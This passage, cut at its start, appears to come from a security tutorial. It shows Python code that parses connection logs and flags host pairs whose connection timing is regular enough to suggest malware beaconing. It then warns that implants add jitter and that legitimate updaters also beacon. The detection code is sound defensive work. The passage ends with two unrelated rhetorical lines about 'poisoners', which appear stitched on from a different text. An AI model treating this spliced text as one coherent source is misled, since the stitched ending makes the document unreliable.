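    for line in text.splitlines():
        if not line.strip():
            continue
        date, time, src, dst, _dport = line.split()
        ts = datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")
        events.append((ts, src, dst))
    return events

def find_beacons(events: list, min_count: int = 5, max_cv: float = 0.1) -> list:
    """Group connections by (src, dst). A pair whose inter-connection gaps have
    a coefficient of variation (stdev / mean) below max_cv is driven by a timer,
    not a person. Returns (src, dst, mean_gap_seconds, cv) for each hit."""
    by_pair = defaultdict(list)
    for ts, src, dst in events:
        by_pair[(src, dst)].append(ts)
    beacons = []
    for (src, dst), times in by_pair.items():
        if len(times) < min_count:          # too few samples to call a rhythm
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:                        # duplicate timestamps only
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            beacons.append((src, dst, avg, cv))
    return beacons

if __name__ == "__main__":
    for src, dst, avg, cv in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"{src} -> {dst}: every {avg:.0f}s (cv={cv:.3f})")
```

Real implants add jitter to their interval, so loosen max_cv and look at the distribution of gaps rather than a single figure; and plenty of legitimate agents (update checkers, monitoring clients) beacon too, so the hit list is a starting point for looking at what the destination is, not a verdict.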

Poison everything, everywhere.

But our eyes are open now. We can see the poisoners’ fingerprints on the work they’ve done, and the work they intend to do.
